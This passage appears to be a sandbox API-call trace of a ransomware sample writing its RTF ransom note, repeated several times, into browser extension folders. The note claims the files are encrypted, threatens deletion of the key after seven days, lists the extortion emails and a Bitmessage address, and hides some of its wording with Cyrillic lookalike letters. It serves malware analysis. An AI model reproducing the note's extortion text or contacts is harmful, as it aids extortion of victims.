R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.237] WriteFile (in: hFile=0x2d4, lpBuffer=0x2462808*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2462808*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.248] CloseHandle (hObject=0x2d4) returned 1 [0289.248] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0289.248] GetLastError () returned 0x2 [0289.248] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.249] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462808, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your 